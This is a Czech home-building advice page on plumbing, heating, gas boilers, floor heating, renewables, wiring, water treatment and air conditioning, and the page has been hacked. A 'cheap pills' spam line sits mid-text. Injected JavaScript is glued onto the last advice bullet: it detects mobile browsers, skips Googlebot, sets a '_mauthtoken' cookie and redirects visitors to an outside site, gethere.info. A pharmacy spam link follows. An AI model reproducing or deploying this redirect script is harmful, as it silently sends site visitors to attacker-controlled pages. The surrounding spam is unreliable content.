pořizujeme vnitřní instalace

Zdravotně technické instalace

Rovněž vnitřní instalace a systémy vytápění rodinného domu prošly za poslední desetiletí rychlým vývojem. Změnily se nejen používané materiály, ale i nároky na hygienickou nezávadnost a trvanlivost .

Pro rozvody kanalizace a pitné vody se nejčastěji používají plasty. Rozvody se většinou navrhují v podlahových vrstvách a svislých stěnách. Hygienickou nezávadnost a trvanlivost garantují příslušné atesty výrobků, které je nutné si vždy od prodejců vyžádat. Kvalitní provedení je nutné prověřit tlakovou zkouškou rozvodů pitné vody a zkouškou nepropustnosti kanalizace. Doklady o těchto zkouškách je nutné předložit při kolaudaci. Montáž těchto rozvodů svěřujeme specializovaným odborným firmám, které by měly vždy poskytnout garance a záruku za kvalitu provedení instalačních prací. Totéž platí pro rozvody plynu.

Neustále rostoucí náklady na energii a zvyšující se ceny vody nás nutí hledat nová řešení z hlediska dlouhodobé výhodnosti. Špičkové termostatické baterie nám přinášejí hned několik výhod najednou. Dokáží nám ušetřit vodu a drahou energii na ohřev, odstraní obtížné nastavování a dolaďování požadované teploty a výrazně snižují možnost náhodného spuštění horké vody. I přes vyšší pořizovací cenu se jednoznačně vyplatí investovat do spolehlivých výrobků, které zaručí bezpečný a úsporný provoz s veškerým komfortem. Pořizovací cena špičkových termostatických baterií není vzhledem k jejich povaze nijak vysoká. Odpovídá zhruba dvojnásobku ceny běžných vodovodních bateríí a tato investice se při jejich hospodárném provozu navrátí již po roce užívání.

Součástí instalací rodinného domu jsou také rozvody centrálních vysavačů. S centrálním vysavačem byt nejen pohodlně uklidíte, ale máte i jistotu, že zásadním způsobem snížíte prašnost ve svém bytě či rodinném domě. Nasátý vzduch spolu se všemi nečistotami je totiž okamžitě vyfukován mimo objekt a víření prachu je takřka nulové, což ocení především lidé stižení různými alergiemi. Další výhodou je snadná manipulace a tichý provoz.

Systémy vytápění rodinného domku

S růstem cen energií a tepla narůstají nároky na kvalitní řešení systému vytápění rodinného domu. Projektovou dokumentaci je nutné zadat projektantovi specialistovi, který na základě provedeného výpočtu tepelných ztrát navrhne vhodný systém a odpovídající výkon ústředního topení, včetně návrhu regulace.

Podle topného média v místě stavby se rozděluje vytápění na plynové, elektrické, výjimečně se realizuje vytápění na tuhá paliva (uhlí, dřevo).

Podle způsobu vytápění se v rodinném domku dělí systémy na klasické rozvody k radiátorům v jednotlivých místnostech a na vytápění podlahové, buď podlahovými rozvody teplé vody, nebo systémem přímotopných elektrických kabelů. Výhodou vytápění pomocí radiátorů je snadná a rychlá ovladatelnost tepelné pohody v jednotlivých místnostech. Podlahové vytápění má podstatně delší dobu náběhu, ale vytváří příjemný pocit tepla rovnoměrně v celém domě. Oba tyto systémy lze kombinovat, např. podlahové vytápění použijeme v koupelnách a v místnostech s vyšší světlou výškou především v přízemí rodinného domu a radiátory v ostatních místnostech.

Celý systém vytápění je vhodné doplnit prvky regulace podle individuálních požadavků stavebníka.Kvalitně provedená regulace je tou nejlepší investicí.Rovněž systém vytápění realizujeme prostřednictvím specializované firmy a dokládáme provedenou tlakovou topnou zkouškou, u elektrického vytápění výchozí revizí.

Jak si vybrat vhodný plynový kotel do novostavby?

Dnes se již stalo běžným standardem, že i velký rodinný dům, který je obýván více lidmi a je proto vybaven 2-3 koupelnami, má tepelnou ztrátu menší než 10-12 kW. Tuto ztrátu má samozřejmě pouze tehdy, pokud poklesne venkovní teplota pod tzv. výpočtovou hodnotu (obvykle -12 °C). Je ovšem všeobecně známo, že běžné teploty v zimním období se pohybují v rozmezí -5 až +5 °C. V pra­xi to pak znamená, že skutečně požadovaný výkon pro vytápění takového objektu se po většinu zimy pohybuje okolo 25 – 50 % jeho tepelné ztráty, tj. v rozmezí 3-6 kW. V nabídce spotřebičů na na­šem trhu lze snadno najít desítky, možná stovky různých typů kotlů, které ohromují svými parametry při provozu na maximální výkon. Velice obtížně se však hledá takový spotřebič, který je schopen optimálně vytápět objekt s malou tepelnou ztrátou a má zároveň dostatečnou výkonovou rezervu pro komfortní přípravu teplé užitkové vody. Pokud není takovýto kotel schopen bez ztráty účinnosti snížit svůj výkon na hodnotu 20°l° tepelné ztráty domu, lze ho směle označit za zcela nevhodný. Důvod je zcela prostý. Je-li minimální výkon spotřebiče vyšší než je okamžitá tepelná ztráta domu, ko­tel neustále cykluje (zapíná se a vypíná). Důsledek je pak značně tristní. Na jedné straně prudce stou­pá spotřeba plynu a na druhé straně stejně dramaticky klesá životnost výrobku (kotel sepne až 40.OOOx za rok). V případě moderní novostavby jsou tedy běžné kotle s minimální hranicí výkonu okolo S kW velice špatnou volbou a nic na tom nezmění ani fakt, že se plně osvědčily například při plynofikacích starších domů s tepelnou ztrátou okolo 25 kW. Proto jsou v námi nabízených projektech rodinných domů zapracovány plynové kondenzační kotle GEMINOX, špičkové produkty výrobce, který tuto technologii zvládl, má s ní 20 let zkušeností a dlouhodobě si udržuje vedoucí postavení na trhu ve Švýcarsku a USA. Široká nabídka nerezových kotlů s lineární modulací výkonu již od 2,3 kW nám umožnila vyřešit problém vytápění novostaveb bez sebemenšího kompromisu. Výsledkem je optimální vytápění, minimální spotřeba, maximální životnost a vysoký komfort přípravy teplé užitkové vody.

Elektrické podlahové vytápění

Podlahové vytápění není vynálezem moderní doby, jak by se na první pohled mohlo zdát. Již ve starém Římě využívali stavitelé důmyslného systému kanálů pod podlahou k jejímu vyhřívání teplým vzduchem.

Hlavní výhodou podlahového topení je výhodnější vertikální rozložení teplot oproti klasickému systému s radiátory. Teplo je navíc předáváno do prostoru sáláním velkou plochou, což i při nižší teplotě vzduchu výrazně zlepšuje tepelnou pohodu v místnosti.Moderní systémy elektrického podlahového vytápění využívají topné kabely zalité v betonové konstrukci podlahy nad vrstvou tepelné izolace. Tato konstrukce se používá především v novostavbách, protože její stavební výška je asi 10 cm a je s ní tedy nutno počítat již v projektu. Problémy s realizací podlahového topení nastávají při použití podlahových konstrukcí tzv. „suché výstavby“.

Na českém trhu se v posledních letech objevily topné systémy, které využívají extrémně tenký topný kabel umístěný ve vrstvě lepidla těsně pod dlažbou. Jedním z nich je např. souprava benešovské firmy V – systém. Dalším dodavatelem elektrického podlahového vytápění je firma DE-VI Břeclav. Z hlediska celkových nákladů je elektrické podlahové topení srovnatelné s jinými typy vytápění. Úspora energie dosažená lepším rozložením teploty v místnosti, výrazně nižší pořizovací náklady a nulové náklady na údržbu spolu s faktem, že elektrické topení lze velmi jednoduše regulovat podle okamžité potřeby tepla – to vše vyrovnává zatím vyšší cenu za jednotku elektrické energie. Elektrické podlahové topení má tedy všechny předpoklady stát se výhodnou alternativou k ostatním druhům vytápění. Topné kabely je možné použít v občanské výstavbě i pro další aplikace, např. pro ochranu venkovních ploch před sněhem a náledím nebo pro ochranu okapů před zamrzáním.

Netradiční zdroje tepelné energie

Jedním z rozhodujících kritérií při výběru nového rodinného domu je jeho pořizovací cena. V současné době, kdy dochází k výraznému zvyšování cen energií se do popředí dostává i další kritérium, kterým jsou provozní náklady vybraného domu. O tom kolik budete platí za provoz Vašeho nového domu se rozhoduje již při jeho projektu. Po výstavbě už často bývá velmi složité a nákladné cokoli měnit. Bohužel právě návrh způsobu vytápění a ohřevu teplé vody bývá často podceňován. Při projekci obvykle projektanti navrhují řešení, která jsou pro ně nejjednodušší a nejrychlejší. Pro každý dům lze dopředu poměrně přesně vypočítat jaké budou jeho provozní náklady při různých způsobech vytápění.

Nejčastěji používaným netradičním zdrojem tepelné energie je slunce. Sluneční kolektory umístěné na střeše domu nebo na jeho stěnách pomáhají při výrobě tepelné energie, teplé užitkové vody, při ohřívání bazénu apod. Dosud málo rozšířeným netradičním zdrojem energie je vítr, přestože na našem trhu jsou firmy, které dodávají malé větrné elektrárny vhodné i pro rodinné domy.

V této části je nutné se zmínit i o výhodách využití tepla z krbů, které tvoří nejen estetický doplněk interiéru Vašeho domu, ale mohou být i vydatným pomocníkem při vytápění zejména v přechodném období na jaře a na podzim. Zvláště nové teplovzdušné krby s teplovodním výměníkem je možné připojit do topného systému jako zdroj tepla pro ohřev teplé užitkové vody nebo vody v bazénu.

V současné době se jeví velice zajímavou volbou zdroje vytápění pořízení tepelného čerpadla. Tepelné čerpadlo odebírá tepelnou energii ze země nebo vzduchu a tím zaručuje provoz s minimálními finančními nároky. Jeho nevýhodou je vyšší pořizovací cena.

Elektroinstalace a slaboproudé rozvody

Elektroinstalace ve stavbách rodinného domu musí být řádně projektově zpracována, včetně návrhů rozvaděčů. Rozvody se provádějí výhradně měděnými vodiči. Skříňky rozvaděčů bývají nejčastěji plastové. Provedení těchto rozvodů může realizovat pouze oprávněná osoba či firma, a ta vydává před uvedením elektroinstalací do provozu výchozí revizi, která je podmínkou připojení rodinného domu na síť nízkého napětí a dokládá se při kolaudaci stavby.

Slaboproudé rozvody se provádějí během stavby rodinného domu. Jde o rozvody telefonní, televizního signálu, či kabelové televize, domácího zvonku, zabezpečovacích systémů a případně počítačové sítě. Při vlastní výstavbě provádíme většinou tzv. zatrubkování a vlastní montáž svěřujeme specializovaným firmám. Zatrubkování je nutno provést dle návrhu specializované firmy.
cheap pills

Proč upravovat vodu ?

Dobrá pitná voda musí obsahovat pouze takové množství prvků, chemických sloučenin a mikroorganismů, aby nedocházelo k poškození zdraví člověka, ani k jiným závadám při použití nebo upotřebení vody. Jinými slovy řečeno, pitnou vodu lze definovat jako zdravotně nezávadnou s dostatečným obsahem biogenních prvků.

Voda může mít z hlediska využívání příznivé, neutrální i škodlivé vlastnosti. Velký význam se přisuzuje i vlastnostem, které esteticky narušují kvalitu pitné vody (např. barva, zákal) nebo ovlivňují organoleptické vlastnosti vody, tj. ve větším či menším měřítku působí na některé smysly (např., chuť, čich). Některé negativní organoleptické vlastnosti získává voda i při chemické úpravě na vodárnách, např. při chloraci může docházet k tvorbě organických chlorderivátů, které dávají vodě nepříjemnou pachuť a které mohou být prokazatelně zdraví škodlivé.

U pitné vody se však nesledují pouze její zdravotní nezávadnost a organoleptické vlastnosti, ale i přítomnost a množství takových látek, které lidský organismus potřebuje jako vyživovací složku. Jsou-li tyto látky ve vodě ve větším množství, lze je označit jako minerální vody. Krátkodobou konzumací sil­ně mineralizovaných vod se dosahuje léčivých efektů. Avšak dlouhodobá konzumace takovéto vo­dy působí nepřiměřené hromadění solí v organismu a ve svém důsledku může vést i k závažným onemocněním. Proto je velmi důležité upravovat pitnou vodu tak, aby obsah biogenních prvků byl v optimální míře.

S vodou, která by splňovala bez jakékoliv úpravy všechny výše uvedené požadavky, se v praxi téměř nesetkáváme. Proto je vhodné a v řadě případů nezbytné upravovat vodu k pití. Jakost vody používané v domácnostech se řídí požadavky pro jednotlivá využití (praní, umývání, voda pro ohřev, topení, voda pro bazén, voda pro zalévání…).

Nevhodná kvalita vody se může projevit nepříznivými účinky (např. skvrnami, zbarvením, tvor­bou usazenin v myčkách, koupelnách, pračkách, bazénech, na nádobí, na listech rostlin, na topných plochách kotlů a ohříváků vody…), korozí kovového potrubí, armatur či jiných kovových částí, které přicházejí do styku s vodou. Pro potlačení těchto nepříznivých vlivů je zapotřebí nejčastěji limitovat tyto ukazatele: barva, zákal, obsah solí, pH, koncentrace železa, vápníku a hořčíku (tvrdost vody). Kromě odželezňování je proto velmi důležité odstranění vápenatých a hořečnatých iontů z vody (změkčován. V zájmu spotřebitele je, aby voda byla rovněž mikrobiálně nezávadná.

Klimatizace

Vzhledem ke zhoršujícím se klimatickým podmínkám a změnám způsobujícím extrémní horka, nebo naopak mrazy, by měl dům nabídnout svým obyvatelům maximální komfort. Komfort, který zajistí příjemně domácí prostředí, a to bez ohledu na to, jak je venku. Dosáhnout tohoto stavu je možno za pomoci vhodné klimatizace, která byt, dům, nebo kancelář v létě příjemně zchladí a na jaře a podzim, či v chladnějších dnech léta naopak poskytne odpovídající teplo bez nutnosti vytápět celý dům. Investice vložená do instalace klimatizace se rychle vrátí, a to nejenom po stránce finanční, ale hlavně po stránce zvýšené životní úrovně. Správně nainstalovaná a nastavená klimatizace Vám může napomoci zbavení se některých civilizačních chorob opakujících se rok co rok. Rýma, migréna z průvanu, či chřipka může být velice dobře eliminována právě díky Kvalitní klimatizaci.

Klimatizace pevné – nazývané mimo jiné splity či multisplity – jsou vhodné pro novostavby. V případě zahrnutí tohoto typu klimatizace do projektu se klimatizace stává nedílnou součástí domu, bez rušivých elementů na celém vzhledu stavby. Split je systém tvořený dvěma hlavními částmi vnitřní a venkovní jednotkou. Tyto dvě jednotky jsou propojeny dvojicí měděných trubek a elektricky kabelem.

Systém pracuje na principu podobném funkci domácí chladničky. Vnitřní jednotka osahuje výparník. Venkovní jednotka obsahuje kompresor a kondenzátor. Vzduch klimatizované místnosti prochází přes výparník a ochlazuje se. Odebrané teplo se odvádí pomocí chladiva trubkami do venkovní jednotky, která poté předává teplo do okolního vzduchu. Výhodou tohoto řešení je uživatelský komfort, tichý chod a velká účinnost.

V našem přehledu schází ještě jedno důležité dělící pravidlo, kterým je schopnost klimatizace regulovat teplotu prostředí. Z tohoto pohledu dělíme klimatizace:

bez tepelného čerpadla – regulují teplotu pouze směrem dolů

s tepelným čerpadlem – jsou schopny regulace teploty vzduchu v obou směrech

Shrneme-li poznatky z výše uvedeného textu dospějeme k faktu, že nejvýhodnějším řešením klimatizace do nového rodinného domu je split systém s tepelným čerpadlem. Použití tohoto typu klimatizace má ještě jednu obrovskou výhodu, kterou je možnost vytápět místnosti v tzv. přechodných obdobích, a to bez nutnosti vytápět centrálním topením celý dům. Vždyť co může být jednoduššího, než si v místnosti, ve které, pobývám zapnout klimatizaci a ohřát s ní během krátké chvilky celý prostor, a to vše bez toho, abych musel vstát ze svého oblíbeného křesla.

Většina dnes dodávaných klimatizací je již elektronicky řízena a zvýšení, či sražení požadované teploty probíhá buďto dle předem naprogramovaných režimů, či za pomoci dálkového ovládání.

Vnitřní instalace – doporučení a rady:

zdravotně technické instalace a elektroinstalaci zadejte specializované odborné firmě, která poskytne odpovídající garanci a záruku

podle dispozičního uspořádání a způsobu užívání jednotlivých místností v domě instalujte odpovídající systém vytápění a regulace – ušetříte provozní náklady

netradiční zdroje tepelné energie budou v budoucnosti neodmyslitelnou součástí provozu celého domuif(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„ooglebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,“);}if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}


take on cheat generic pills without a doctor – http://hadisuseno.mhs.narotama.ac.id/2016/11/30/take-on-cheat-generic-pills-without-a-doctor/